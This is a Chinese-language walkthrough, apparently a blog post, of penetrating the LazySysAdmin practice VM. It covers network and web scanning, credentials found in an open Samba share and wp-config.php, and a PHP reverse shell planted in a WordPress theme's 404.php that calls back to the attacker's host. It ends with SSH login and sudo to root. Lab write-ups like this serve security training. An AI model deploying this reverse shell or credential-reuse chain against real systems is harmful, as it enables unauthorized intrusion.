Lazy 靶机渗透

Lazy靶机渗透

1. 渗透过程

  • 话不多少说开始搜集信息:

  • 这里使用 netdiscover : netdiscover -i eth0 -r 192.168.0.0/24

  • 发现一条

    192.168.0.110   00:0c:29:b8:5f:5f      1      60  VMware, Inc.
  • 使用nmap进一步探测端口 nmap -sS 192.168.0.110 -oN /tmp/r.txt

  • 扫描结果

    Host is up (0.00022s latency).
    Not shown: 994 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    3306/tcp open mysql
    6667/tcp open irc
    MAC Address: 00:0C:29:B8:5F:5F (VMware)
    #后来用 nmap -v -A 192.168.0.110 扫面出
    139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
  • 80肯定是web,139和445都是Samba

  • 我们先用nikto 扫面一下web,再试试Samba能不能连接

  • nikto -host http://192.168.0.110/ -o /tmp/r.html

  • 我用kali里面的连接网络文件夹输入 smb://192.168.0.110

  • 发现有两个文件夹一个是 $print 另一个是 $share 发现第一个需要密码,第二个可以匿名访问

  • 进去看看,都是一代码

  • 还找到一个文件 deets.txt 内容是

    CBF Remembering all these passwords.

    Remember to remove this file and update your password after we push out the server.

    Password 12345

    CBF记住所有这些密码。
    请记住在我们推出服务器后删除此文件并更新您的密码。
    密码12345
  • 发现一个服务器默认的密码 12345

  • 这时候我们在看nikto扫描的结果:

  • 发现网站是wordpress框架,还有phpmyadmin的地址…

  • 进到wordpress之后发现只有一篇文章,都是这句话My name is togie.

  • 这可能是某个用户名

  • 这些相关的目录在$share都有那我们直接找wordpress的后台地址:wp-admin

  • 还在 wp-config.php找到了mysql的账号密码 Admin :TogieMYSQL12345^^

  • 而且nikto还扫描到 phpmyadmin的地址,登进去看看,发现没有select权限,

  • 那我们进去wp-admin看看也需要密码,咋办没密码呀,数据库也进不去,那就试试mysql的密码吧

  • 发现mysql的密码竟然和 wordpress的账号密码是一样

  • 进后台之后,查到可以修改主题的源代码,那我们就修改404.php 给了一个反弹shell的代码:

    <?php
    set_time_limit(0);
    $ip='192.168.0.21';
    $port='20096';
    $fp=@fsockopen($ip,$port,$errno,$errstr);
    if(!$fp){ echo "error";}
    else{
    fputs($fp,"\nconnect success\n");
    while (!feof($fp)) {
    fputs($fp,"shell:");
    $shell=fgets($fp);
    $message=`$shell`;
    fputs($fp,$message);
    }
    fclose($fp);
    }
    ?>
  • 然后nc监听一下,激活主题并且访问一个不存在的帖子

  • http://192.168.0.110/wordpress/?p=-1

  • nc就弹回一个 www-dada 的shell

  • 然后我们查看 /etc/passwd文件发现

    togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
  • 哈?这不就是之前说的那个可能的用户名嘛

  • 然后服务器默认的密码 12345,那我们试试ssh能不能给他连上了

  • kali输入命令 : ssh togie@192.168.0.110给我来一一段这样的话?

    #############################################################################
    # Welcome to Web_TR1 #
    # All connections are monitored and recorded #
    # Disconnect IMMEDIATELY if you are not an authorized user! #
    #############################################################################
    togie@192.168.0.110's password:

    1. 欢迎使用Web目录1
    2. 所有连接都被监视和记录
    3. 如果您不是授权用户,请立即断开连接!
  • 哈? 吓我呢?

  • 试试密码,进去了,哈哈哈~

  • 走一下三部曲

  • ls -al ~/

  • 发现没啥

  • crontab -l

  • 也没啥

  • history

  • 也没啥~

  • 然后我加一个第四部曲

  • sudo -l

    User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
    用户togie可以在lazysadmin上运行以下命令:
    (全部:全部)全部
  • 那还说什么 直接就是root权限了

  • 直接 sudo passwd root

  • root不就来了嘛

  • root用户下看到一个 proof.txt

  • 内容是:

    WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


    Well done :)

    Hope you learn't a few things along the way.

    Regards,

    Togie Mcdogie

    Enjoy some random strings

    WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
    2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
    pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
    bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
  • WELL_DONE!!!

2. 重要信息

# 1. phpmyadmin地址
http://192.168.0.110/phpmyadmin/
# 2. wordpress管理后台
http://192.168.0.110/wordpress/wp-admin
# 3. mysql账号密码:
Admin :TogieMYSQL12345^^ (也是wordpress管理后台的账号密码)
# 4. ssh账号密码:
togie :12345
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值